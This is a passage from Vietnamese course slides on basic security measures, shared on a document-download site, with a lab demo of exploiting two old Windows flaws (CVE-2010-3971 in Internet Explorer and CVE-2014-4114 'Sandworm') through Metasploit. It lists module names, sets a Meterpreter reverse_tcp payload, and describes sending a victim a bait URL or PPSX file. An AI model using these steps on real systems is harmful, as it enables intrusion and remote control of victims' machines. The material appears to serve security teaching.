Tải bản đầy đủ - 0 (trang)
Các biện pháp bảo mật CƠ bản

Các biện pháp bảo mật CƠ bản

Tải bản đầy đủ - 0trang

4. DEMO



4.1. CVE 2010-3971: INTERNET EXPLORER EXPLOIT

-



KỊCH BẢN KHAI THÁC MS11_003 :

Mục tiêu khai thác: Internet Explorer 6,7,8

Máy Attacker: Kali-Linux

Máy Victim : Windows 7.

Bằng cách sử dụng mô-đun Metasploit

ms11_003_ie_css_import trên KaLi.

Cài đặt và tạo ra một URL trên máy KaLi.

Đính kèm gửi làm mồi URL cho máy nạn nhân.



16



4.1. CVE 2010-3971: INTERNET EXPLORER EXPLOIT

 IP KaLi: 192.168.255.130 && IP Victim: 192.168.255.131

 Sử dụng use exploit/windows/browser/ms11_003_ie_css_import

 IP Victim: 192.168.255.131



17



4.1. CVE 2010-3971: INTERNET EXPLORER EXPLOIT

 Sử dụng Msf exploit (ms11_003_ie_css_import)>set payload



windows/meterpreter/reverse_tcp



 Cài đặt các tham số SRVHOST( địa chỉ máy cục bộ) và LHOST.



18



4.1. CVE 2010-3971: INTERNET EXPLORER EXPLOIT

 Dùng lệnh exploit để chạy và tạo ra 1 URL . Copy URL và gửi cho Victim :



19



4.1. CVE 2010-3971: INTERNET EXPLORER EXPLOIT

 Khi nạn nhân click vào đường link được attacker gửi. Bên máy Kali sẽ chạy được như



hình bên:



20



4.1. CVE 2010-3971: INTERNET EXPLORER EXPLOIT



21



4.1. CVE 2010-3971: INTERNET EXPLORER EXPLOIT

 Sau khi khai thác ta sẽ được kết quả:



22



4.2. CVE 2014-4114 : WINDOWS OLE EXPLOIT - SANDWORM

KỊCH BẢN KHAI THÁC MS14-060

- Cho phép kẻ tấn cơng có thể thực thi mã từ xa trên hệ thống mục tiêu khi

một người dùng mở một tậptin có chứa các OLE object lừa đảo.

- OLE là cơng nghệ Object Linking and Embedding (OLE) của Mircrosoft

cho phép nội dung có thể liên kết bên trong các tài liệu.

- Máy Attacker : KaLi-Linux

- Máy Victim : Windows 7

- Bằng cách sừ dụng metasploit trên kali tạo ra file PPSX.

- Và chia sẻ cho file PPSX cho máy victim để lừa và mở ra.



23



4.2. CVE 2014-4114 : WINDOWS OLE EXPLOIT - SANDWORM

 Sử dụng: exploit/windows/fileformat/ms14_060_sandworm



24



4.2. CVE 2014-4114 : WINDOWS OLE EXPLOIT - SANDWORM

 Dùng payload: set payload windows/meterpreter/reverse_tcp



25



Tài liệu bạn tìm kiếm đã sẵn sàng tải về

Các biện pháp bảo mật CƠ bản

Tải bản đầy đủ ngay(0 tr)

×
x